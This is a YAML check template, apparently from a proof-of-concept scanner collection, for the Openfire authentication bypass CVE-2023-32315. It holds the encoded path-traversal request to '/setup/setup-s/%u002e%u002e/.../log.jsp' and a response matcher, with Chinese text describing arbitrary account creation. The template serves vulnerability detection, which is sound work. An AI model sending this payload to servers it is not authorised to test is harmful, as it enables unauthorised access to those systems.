Poc_Scanner/poc/CVE-Poc/CVE-2023-32315_Openfire.yaml

30 lines
763 B
YAML
Raw Normal View History

2024-10-09 15:15:50 +08:00
keyword: openfire
name: Openfire身份认证绕过
description: |
Openfire 服务器存在身份认证绕过漏洞,攻击者通过构造特定 URL 链接以 GET 请求发送至漏洞服务器中,即可创建任意账户,进而获取系统权限。
requests:
path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
method: GET
headers:
User-agent:
Content-length:
Accept:
Content-type:
Accept-Encoding:
Cookie:
Referer:
X-Forwarded-For:
body-raw: |-
response:
status-code: 200
body: "line"
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: |
攻击者可以通过利用此漏洞在 Openfire 服务器上创建任意账户,并获取系统权限。